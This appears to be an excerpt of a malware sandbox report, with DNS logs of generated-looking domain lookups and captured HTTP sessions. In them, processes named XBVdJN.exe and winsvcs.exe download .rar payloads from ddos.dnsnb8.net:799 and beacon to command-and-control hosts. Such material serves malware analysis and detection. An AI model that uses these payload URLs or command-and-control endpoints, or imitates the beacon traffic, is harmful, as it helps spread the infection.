Jul 25, 2024 15:14:48.610685110 CEST	1.1.1.1	192.168.2.6	0xabd9	No error (0)	fiiauediehduefuge.ru		44.221.84.105	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:50.328067064 CEST	1.1.1.1	192.168.2.6	0xf091	Name error (3)	nousiieiffgogogoo.ru	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:51.529253960 CEST	1.1.1.1	192.168.2.6	0x71a1	Name error (3)	fifiehsueuufidhfi.ru	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:52.697886944 CEST	1.1.1.1	192.168.2.6	0xc6b9	Name error (3)	eofihsishihiursgu.ru	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:53.908288956 CEST	1.1.1.1	192.168.2.6	0xe295	Name error (3)	nnososoosjfeuhueu.ru	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:14:55.234798908 CEST	1.1.1.1	192.168.2.6	0x676b	No error (0)	ssofhoseuegsgrfnj.su		92.246.89.93	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:00.414899111 CEST	1.1.1.1	192.168.2.6	0x7a0e	Name error (3)	slpsrgpsrhojifdij.su	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:01.625380993 CEST	1.1.1.1	192.168.2.6	0x72e0	Name error (3)	aiiaiafrzrueuedur.su	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:02.889776945 CEST	1.1.1.1	192.168.2.6	0x313f	Name error (3)	fuaiuebndieufeufu.su	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:04.096728086 CEST	1.1.1.1	192.168.2.6	0x6e37	Name error (3)	eiifngjfksisiufjf.su	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:05.274229050 CEST	1.1.1.1	192.168.2.6	0xb8ed	Name error (3)	eoroooskfogihisrg.su	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:06.450229883 CEST	1.1.1.1	192.168.2.6	0xa674	Name error (3)	noeuaoenriusfiruu.su	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:07.652426004 CEST	1.1.1.1	192.168.2.6	0x7fb1	Name error (3)	iuirshriuisruruuf.su	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:09.405515909 CEST	1.1.1.1	192.168.2.6	0x3fd7	No error (0)	afeifieuuufufufuf.su		92.246.89.93	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:14.613394022 CEST	1.1.1.1	192.168.2.6	0x8162	Name error (3)	srndndubsbsifurfd.su	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:15.823622942 CEST	1.1.1.1	192.168.2.6	0xae44	Name error (3)	fiiauediehduefuge.su	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:17.031714916 CEST	1.1.1.1	192.168.2.6	0xae2b	Name error (3)	nousiieiffgogogoo.su	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:18.194735050 CEST	1.1.1.1	192.168.2.6	0xe3fb	Name error (3)	fifiehsueuufidhfi.su	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:19.404558897 CEST	1.1.1.1	192.168.2.6	0x66be	Name error (3)	eofihsishihiursgu.su	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:20.624769926 CEST	1.1.1.1	192.168.2.6	0xa40	Name error (3)	nnososoosjfeuhueu.su	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:22.121957064 CEST	1.1.1.1	192.168.2.6	0x4783	No error (0)	ssofhoseuegsgrfnj.in		208.100.26.245	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:23.766561031 CEST	1.1.1.1	192.168.2.6	0x820e	Name error (3)	slpsrgpsrhojifdij.in	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:25.408566952 CEST	1.1.1.1	192.168.2.6	0x3195	Name error (3)	aiiaiafrzrueuedur.in	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:26.563381910 CEST	1.1.1.1	192.168.2.6	0x60b8	Name error (3)	fuaiuebndieufeufu.in	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:27.866024971 CEST	1.1.1.1	192.168.2.6	0xbbf0	No error (0)	eiifngjfksisiufjf.in		44.213.104.86	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:29.547326088 CEST	1.1.1.1	192.168.2.6	0x5887	Name error (3)	eoroooskfogihisrg.in	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:30.849684000 CEST	1.1.1.1	192.168.2.6	0x1ee1	Name error (3)	noeuaoenriusfiruu.in	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:32.734591961 CEST	1.1.1.1	192.168.2.6	0x1235	No error (0)	iuirshriuisruruuf.in		44.221.84.105	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:34.453625917 CEST	1.1.1.1	192.168.2.6	0x52c2	Name error (3)	afeifieuuufufufuf.in	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:35.817830086 CEST	1.1.1.1	192.168.2.6	0x6f4d	Name error (3)	srndndubsbsifurfd.in	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:36.952613115 CEST	1.1.1.1	192.168.2.6	0x2f71	Name error (3)	fiiauediehduefuge.in	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:38.077578068 CEST	1.1.1.1	192.168.2.6	0x3652	Name error (3)	nousiieiffgogogoo.in	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:39.219974041 CEST	1.1.1.1	192.168.2.6	0x90bb	Name error (3)	fifiehsueuufidhfi.in	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:40.361435890 CEST	1.1.1.1	192.168.2.6	0x3829	Name error (3)	eofihsishihiursgu.in	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:41.502330065 CEST	1.1.1.1	192.168.2.6	0x4d2b	Name error (3)	nnososoosjfeuhueu.in	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:42.643661022 CEST	1.1.1.1	192.168.2.6	0x4364	Name error (3)	ssofhoseuegsgrfnj.net	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:43.970180988 CEST	1.1.1.1	192.168.2.6	0x1ead	No error (0)	slpsrgpsrhojifdij.net		13.251.16.150	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:46.673913002 CEST	1.1.1.1	192.168.2.6	0x60b4	No error (0)	aiiaiafrzrueuedur.net		185.215.113.66	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:48.614532948 CEST	1.1.1.1	192.168.2.6	0x6c65	Name error (3)	fuaiuebndieufeufu.net	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:49.752501011 CEST	1.1.1.1	192.168.2.6	0x83b	Name error (3)	eiifngjfksisiufjf.net	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:50.916500092 CEST	1.1.1.1	192.168.2.6	0x3c3d	Name error (3)	eoroooskfogihisrg.net	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:52.047518969 CEST	1.1.1.1	192.168.2.6	0xc6bc	Name error (3)	noeuaoenriusfiruu.net	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:53.175554991 CEST	1.1.1.1	192.168.2.6	0x5404	Name error (3)	iuirshriuisruruuf.net	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:54.312077999 CEST	1.1.1.1	192.168.2.6	0x5e49	Name error (3)	afeifieuuufufufuf.net	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:55.440915108 CEST	1.1.1.1	192.168.2.6	0x2a3d	Name error (3)	srndndubsbsifurfd.net	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:56.912908077 CEST	1.1.1.1	192.168.2.6	0x996b	Name error (3)	fiiauediehduefuge.net	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:56.922616005 CEST	1.1.1.1	192.168.2.6	0x996b	Name error (3)	fiiauediehduefuge.net	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:15:58.222551107 CEST	1.1.1.1	192.168.2.6	0x22f5	No error (0)	nousiieiffgogogoo.net		18.141.10.107	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:00.752420902 CEST	1.1.1.1	192.168.2.6	0xd5d4	Name error (3)	fifiehsueuufidhfi.net	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:02.071814060 CEST	1.1.1.1	192.168.2.6	0x1a03	No error (0)	eofihsishihiursgu.net		44.213.104.86	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:03.870702982 CEST	1.1.1.1	192.168.2.6	0x1d26	No error (0)	ssofhoseuegsgrfnj.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:05.717729092 CEST	1.1.1.1	192.168.2.6	0x7254	Name error (3)	slpsrgpsrhojifdij.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:06.920284986 CEST	1.1.1.1	192.168.2.6	0xf629	Name error (3)	aiiaiafrzrueuedur.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:08.047108889 CEST	1.1.1.1	192.168.2.6	0xf2b7	Name error (3)	fuaiuebndieufeufu.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:09.702545881 CEST	1.1.1.1	192.168.2.6	0x42e2	No error (0)	eiifngjfksisiufjf.biz		34.218.204.173	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:11.545438051 CEST	1.1.1.1	192.168.2.6	0x63ae	Name error (3)	eoroooskfogihisrg.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:12.850660086 CEST	1.1.1.1	192.168.2.6	0x9fe7	No error (0)	noeuaoenriusfiruu.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:14.781003952 CEST	1.1.1.1	192.168.2.6	0xd8d5	Name error (3)	iuirshriuisruruuf.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:15.907104969 CEST	1.1.1.1	192.168.2.6	0x91e7	Name error (3)	afeifieuuufufufuf.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:17.036204100 CEST	1.1.1.1	192.168.2.6	0x32c9	Name error (3)	srndndubsbsifurfd.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:18.547014952 CEST	1.1.1.1	192.168.2.6	0x1ddb	Name error (3)	fiiauediehduefuge.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:18.547034025 CEST	1.1.1.1	192.168.2.6	0x1ddb	Name error (3)	fiiauediehduefuge.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:19.672938108 CEST	1.1.1.1	192.168.2.6	0xd87f	Name error (3)	nousiieiffgogogoo.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:20.971801996 CEST	1.1.1.1	192.168.2.6	0x3f02	No error (0)	fifiehsueuufidhfi.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:23.268949032 CEST	1.1.1.1	192.168.2.6	0x5779	Name error (3)	eofihsishihiursgu.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:24.421735048 CEST	1.1.1.1	192.168.2.6	0x5dab	Name error (3)	nnososoosjfeuhueu.net	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:25.547086954 CEST	1.1.1.1	192.168.2.6	0x1b62	Name error (3)	ssofhoseuegsgrfnj.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:26.699956894 CEST	1.1.1.1	192.168.2.6	0x319c	Name error (3)	slpsrgpsrhojifdij.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:27.854243994 CEST	1.1.1.1	192.168.2.6	0x3ad4	Name error (3)	aiiaiafrzrueuedur.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:29.667366028 CEST	1.1.1.1	192.168.2.6	0xa8ba	No error (0)	fuaiuebndieufeufu.com		54.244.188.177	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:29.667426109 CEST	1.1.1.1	192.168.2.6	0xa8ba	No error (0)	fuaiuebndieufeufu.com		54.244.188.177	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:31.708091974 CEST	1.1.1.1	192.168.2.6	0x53d7	Name error (3)	eiifngjfksisiufjf.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:32.867100000 CEST	1.1.1.1	192.168.2.6	0xa3c9	Name error (3)	eoroooskfogihisrg.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:34.064666033 CEST	1.1.1.1	192.168.2.6	0x8f77	Name error (3)	noeuaoenriusfiruu.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:35.205379009 CEST	1.1.1.1	192.168.2.6	0x5675	Name error (3)	iuirshriuisruruuf.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:36.356127977 CEST	1.1.1.1	192.168.2.6	0xb2d3	No error (0)	afeifieuuufufufuf.com		74.119.239.234	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:16:59.144759893 CEST	1.1.1.1	192.168.2.6	0xe359	Name error (3)	srndndubsbsifurfd.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:00.713849068 CEST	1.1.1.1	192.168.2.6	0xcdde	Name error (3)	fiiauediehduefuge.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:00.714055061 CEST	1.1.1.1	192.168.2.6	0xcdde	Name error (3)	fiiauediehduefuge.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:03.151489019 CEST	1.1.1.1	192.168.2.6	0xa871	Name error (3)	nousiieiffgogogoo.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:03.154779911 CEST	1.1.1.1	192.168.2.6	0xa871	Name error (3)	nousiieiffgogogoo.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:03.156706095 CEST	1.1.1.1	192.168.2.6	0xa871	Name error (3)	nousiieiffgogogoo.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:04.484365940 CEST	1.1.1.1	192.168.2.6	0x599a	No error (0)	fifiehsueuufidhfi.com		54.244.188.177	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:06.430552959 CEST	1.1.1.1	192.168.2.6	0x2872	Name error (3)	eofihsishihiursgu.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:07.928505898 CEST	1.1.1.1	192.168.2.6	0x93ea	Name error (3)	nnososoosjfeuhueu.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:07.928594112 CEST	1.1.1.1	192.168.2.6	0x93ea	Name error (3)	nnososoosjfeuhueu.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:11.092981100 CEST	1.1.1.1	192.168.2.6	0xba10	Name error (3)	slpsrgpsrhojifdij.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:12.584923029 CEST	1.1.1.1	192.168.2.6	0x22e5	Name error (3)	aiiaiafrzrueuedur.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:12.584997892 CEST	1.1.1.1	192.168.2.6	0x22e5	Name error (3)	aiiaiafrzrueuedur.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:13.724020958 CEST	1.1.1.1	192.168.2.6	0x8c3e	Name error (3)	fuaiuebndieufeufu.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:16.942445040 CEST	1.1.1.1	192.168.2.6	0x6220	Name error (3)	eoroooskfogihisrg.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:19.954668045 CEST	1.1.1.1	192.168.2.6	0xf449	Name error (3)	iuirshriuisruruuf.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:21.095153093 CEST	1.1.1.1	192.168.2.6	0xdb3f	Name error (3)	afeifieuuufufufuf.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:22.272984982 CEST	1.1.1.1	192.168.2.6	0x5083	Name error (3)	srndndubsbsifurfd.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:23.427980900 CEST	1.1.1.1	192.168.2.6	0xec04	Name error (3)	fiiauediehduefuge.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:24.569910049 CEST	1.1.1.1	192.168.2.6	0x8ab	Name error (3)	nousiieiffgogogoo.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 15:17:28.697144032 CEST	1.1.1.1	192.168.2.6	0xa5fb	Name error (3)	eofihsishihiursgu.biz	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

ssofhoseuegsgrfnu.ru

ww88.ssofhoseuegsgrfnu.ru

92.63.197.48

slpsrgpsrhojifdij.ru

aiiaiafrzrueuedur.ru

fiiauediehduefuge.ru

ssofhoseuegsgrfnj.su

afeifieuuufufufuf.su

ssofhoseuegsgrfnj.in

eiifngjfksisiufjf.in

iuirshriuisruruuf.in

slpsrgpsrhojifdij.net

aiiaiafrzrueuedur.net

nousiieiffgogogoo.net

eofihsishihiursgu.net

ssofhoseuegsgrfnj.biz

eiifngjfksisiufjf.biz

noeuaoenriusfiruu.biz

fifiehsueuufidhfi.biz

fuaiuebndieufeufu.com

afeifieuuufufufuf.com

fifiehsueuufidhfi.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49722	44.221.84.105	799	6516	C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:13:19.618397951 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49724	44.221.84.105	799	6516	C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:13:24.452306986 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49731	44.221.84.105	799	6256	C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:13:40.221301079 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49733	170.39.226.155	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:13:41.579219103 CEST	158	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: ssofhoseuegsgrfnu.ru
Jul 25, 2024 15:13:42.539278984 CEST	244	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: http://ww88.ssofhoseuegsgrfnu.ru/ Date: Thu, 25 Jul 2024 13:13:42 GMT Content-Length: 68 Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 38 38 2e 73 73 6f 66 68 6f 73 65 75 65 67 73 67 72 66 6e 75 2e 72 75 2f 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="http://ww88.ssofhoseuegsgrfnu.ru/">Moved Permanently</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49734	199.59.243.226	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:13:42.762067080 CEST	170	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: ww88.ssofhoseuegsgrfnu.ru Connection: Keep-Alive
Jul 25, 2024 15:13:43.265232086 CEST	1236	IN	HTTP/1.1 200 OK date: Thu, 25 Jul 2024 13:13:43 GMT content-type: text/html; charset=utf-8 content-length: 1070 x-request-id: 6e7dcc87-362b-4671-a36b-ec33e96e52ae cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vR4VHrKotkztFI7kbVNMUmzEZ2KTEx3rRXOBVz/AVccxU1b1dFkNd1H1Tfer0tWGIqfXkFdhyE8WcGdHRHA0pQ== set-cookie: parking_session=6e7dcc87-362b-4671-a36b-ec33e96e52ae; expires=Thu, 25 Jul 2024 13:28:43 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 52 34 56 48 72 4b 6f 74 6b 7a 74 46 49 37 6b 62 56 4e 4d 55 6d 7a 45 5a 32 4b 54 45 78 33 72 52 58 4f 42 56 7a 2f 41 56 63 63 78 55 31 62 31 64 46 6b 4e 64 31 48 31 54 66 65 72 30 74 57 47 49 71 66 58 6b 46 64 68 79 45 38 57 63 47 64 48 52 48 41 30 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vR4VHrKotkztFI7kbVNMUmzEZ2KTEx3rRXOBVz/AVccxU1b1dFkNd1H1Tfer0tWGIqfXkFdhyE8WcGdHRHA0pQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Jul 25, 2024 15:13:43.265372038 CEST	504	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmU3ZGNjODctMzYyYi00NjcxLWEzNmItZWMzM2U5NmU1MmFlIiwicGFnZV90aW1lIjoxNzIxOTEzMjIzLCJwYWdlX3VybCI6I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49735	44.221.84.105	799	6256	C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:13:44.022974968 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49736	92.63.197.48	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:13:44.442042112 CEST	150	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: 92.63.197.48

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49737	44.221.84.105	799	6256	C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:13:46.669744015 CEST	288	OUT	GET /cj//k3.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49738	44.221.84.105	799	6256	C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:13:50.951833010 CEST	288	OUT	GET /cj//k4.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49739	44.221.84.105	799	6256	C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:13:53.598258972 CEST	288	OUT	GET /cj//k5.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49742	92.246.89.93	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:14:07.012612104 CEST	158	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: slpsrgpsrhojifdij.ru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49747	92.246.89.93	80	2784	C:\Windows\94000696690303050\winsvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 15:14:30.015019894 CEST	158	OUT	GET /tldr.php?newinf=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Host: aiiaiafrzrueuedur.ru

